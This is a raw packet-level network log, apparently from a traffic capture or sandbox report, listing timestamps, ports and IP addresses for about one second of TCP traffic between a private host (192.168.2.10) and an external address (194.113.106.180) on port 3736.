Sep 15, 2024 15:02:26.797250032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.797262907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.797281027 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.797307014 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.797328949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.797580004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.797626972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.801949978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802839041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802850008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802862883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802895069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802898884 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.802906036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802917004 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.802917957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802938938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802946091 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.802952051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802964926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.802993059 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.803014994 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.803419113 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.803458929 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.803469896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.803494930 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.803498983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.803512096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.803566933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.804434061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.804460049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.804474115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.804485083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.804486036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.804501057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.804514885 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.804542065 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.805238962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.805257082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.805269957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.805279970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.805293083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.805309057 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.805335045 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.806077003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806092024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806103945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806123972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.806139946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.806181908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806194067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806233883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.806862116 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806898117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806910038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806921959 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806934118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.806956053 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.806986094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.807758093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.807775974 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.807787895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.807817936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.807818890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.807851076 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.808307886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.808353901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.808429956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.808517933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.808527946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.808568954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.815481901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.815498114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.815510035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.815540075 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.815557003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.819559097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.819571972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.819582939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.819618940 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.824685097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.824698925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.824709892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.824767113 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.824789047 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.830410004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.830421925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.830435038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.830485106 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.833688974 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.833719969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.833729982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.833758116 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.833758116 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.837296963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.837347031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.837403059 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.837503910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.837528944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.837573051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.841428041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.841439962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.841450930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.841496944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.843616962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.843628883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.843640089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.843683958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.843713999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.847107887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.847203970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.847214937 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.847245932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.847261906 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.847276926 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.852557898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.852569103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.852579117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.852623940 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.855074883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.855122089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.855128050 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.855133057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.855175018 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.856528997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.856554985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.856565952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.856606960 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.859627008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.859637976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.859647989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.859677076 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.859689951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.862651110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.862663031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.862672091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.862694979 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.865782976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.865828037 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.865890026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.865900993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.865931988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.865977049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.868727922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.868772984 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.868840933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.868850946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.868859053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.868886948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.872167110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.872208118 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.872365952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.872375965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.872404099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.872406006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.874727011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.874766111 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.874771118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.874784946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.874859095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.877705097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.877716064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.877721071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.877774000 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.881014109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.881026030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.881035089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.881081104 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.883600950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.883614063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.883682966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.883692026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.883768082 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.883768082 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.886837006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.886847973 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.886857986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.886887074 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.889803886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.889816999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.889827967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.889914989 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.892796993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.892880917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.892890930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.892930031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.899199009 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.899218082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.899229050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.899280071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.899734974 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.901953936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.901973009 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.901984930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.902045012 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.904597998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.904609919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.904620886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.904658079 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.904687881 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.904727936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.904759884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.904772043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.904800892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.907557011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.907608032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.907614946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.907618999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.907663107 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.910118103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.910129070 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.910140991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.910190105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.912971973 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.913033962 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.913058043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.913068056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.913078070 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.913104057 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.915530920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.915541887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.915551901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.915563107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.915585995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.915612936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.918718100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.918755054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.918764114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.918765068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.918802023 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.921145916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.921158075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.921166897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.921176910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.921201944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.921228886 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.923806906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.923818111 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.923827887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.923858881 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.926497936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.926507950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.926532030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.926543951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.926565886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.926570892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.929408073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.929471970 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.929630041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.929646015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.929656029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.929681063 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.931658983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.931669950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.931679964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.931711912 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.931745052 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.934422970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.934442997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.934453011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.934490919 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.937026024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.937113047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.937123060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.937134981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.937185049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.937185049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.940254927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.940265894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.940275908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.940310001 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.940325022 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.945204020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.945216894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.945226908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.945301056 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.946089029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.946134090 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.946162939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.946173906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.946212053 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.947516918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.947549105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.947559118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.947590113 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.951067924 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.951128006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.951222897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.951234102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.951267958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.954500914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.954608917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.954619884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.954655886 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.955502987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.955514908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.955524921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.955553055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.955571890 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.958599091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.958610058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.958621979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.958669901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.959274054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.959315062 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.959544897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.959572077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:26.959613085 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:26.959656954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.007467985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.178952932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179002047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179066896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179078102 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179097891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179141998 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179150105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179186106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179218054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179227114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179251909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179280996 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179307938 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.179332972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179367065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.179378986 CEST	49701	3736	192.168.2.10	194.113.106.180
